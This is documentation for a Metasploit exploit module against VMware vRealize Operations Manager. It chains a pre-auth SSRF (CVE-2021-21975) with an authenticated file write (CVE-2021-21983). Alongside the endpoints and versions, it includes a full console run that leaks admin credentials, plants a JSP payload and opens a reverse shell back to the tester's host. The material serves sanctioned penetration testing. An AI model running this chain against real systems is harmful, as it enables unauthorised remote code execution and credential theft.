## Vulnerable Application

### Description

This module exploits a pre-auth SSRF ([CVE-2021-21975]) and post-auth
file write ([CVE-2021-21983]) in VMware vRealize Operations Manager to
leak admin creds and write/execute a JSP payload.

CVE-2021-21975 affects the `/casa/nodes/thumbprints` endpoint, and
CVE-2021-21983 affects the `/casa/private/config/slice/ha/certificate`
endpoint. Code execution occurs as the `admin` Unix user.

The following vRealize Operations Manager versions are vulnerable:

* 7.0.0
* 7.5.0
* 8.0.0, 8.0.1
* 8.1.0, 8.1.1
* 8.2.0
* 8.3.0

Version 8.3.0 is not exploitable for creds and is therefore not
supported by this module. Tested successfully against 8.0.1, 8.1.0,
8.1.1, and 8.2.0.

[CVE-2021-21975]: https://nvd.nist.gov/vuln/detail/CVE-2021-21975
[CVE-2021-21983]: https://nvd.nist.gov/vuln/detail/CVE-2021-21983

### Setup

Import an exploitable vRealize Operations Manager OVA, such as
[`vRealize-Operations-Manager-Appliance-8.0.1.15331180_OVF10.ova`], into
your desired hypervisor. Boot the virtual appliance, and it should be
exploitable out of the box once it's up.

[`vRealize-Operations-Manager-Appliance-8.0.1.15331180_OVF10.ova`]:
https://my.vmware.com/web/vmware/downloads/details?downloadGroup=VROPS-801&productId=940&rPId=40733

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

`vRealize Operations Manager < 8.3.0`

## Scenarios

### vRealize Operations Manager 8.0.1

```
msf6 > use exploit/linux/http/vmware_vrops_mgr_ssrf_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > options

Module options (exploit/linux/http/vmware_vrops_mgr_ssrf_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8443             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   vRealize Operations Manager < 8.3.0


msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhosts 192.168.123.185
rhosts => 192.168.123.185
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Starting SSRF server...
[*] Using URL: https://0.0.0.0:8443/XtwOOPWn9SJ7
[*] Local IP: https://192.168.1.65:8443/XtwOOPWn9SJ7
[*] Executing automatic check (disable AutoCheck to override)
[*] Leaking admin creds via SSRF...
[*] 192.168.123.1:8443/XtwOOPWn9SJ7#
[*] 192.168.123.185 connected to SSRF server!
GET /XtwOOPWn9SJ7 HTTP/1.1
Accept: application/xml, application/json
Content-Type: application/json
Accept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp
X-VSCM-Request-Id: S30000FM
Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpLWGp3ZWlmZlBIMGNlM3o5RENRb2o3V1I=
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_212
Host: 192.168.123.1:8443
Connection: keep-alive


[+] Successfully leaked admin creds
[*] Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpLWGp3ZWlmZlBIMGNlM3o5RENRb2o3V1I=
[+] The target is vulnerable.
[*] Writing JSP payload
[*] /usr/lib/vmware-casa/casa-webapp/webapps/casa/0DlEVqGWYr.jsp
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[*] https://192.168.123.185/casa/0DlEVqGWYr.jsp
[+] Successfully executed JSP payload
[+] Deleted /usr/lib/vmware-casa/casa-webapp/webapps/casa/0DlEVqGWYr.jsp
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.185:59260) at 2021-04-11 12:19:21 -0500
[*] Server stopped.

id
uid=1000(admin) gid=1003(admin) groups=1003(admin),0(root),25(apache),28(wheel)
uname -a
Linux vRealizeClusterNode 4.19.69-1.ph3 #1-photon SMP Fri Sep 6 00:00:41 UTC 2019 x86_64 GNU/Linux
```
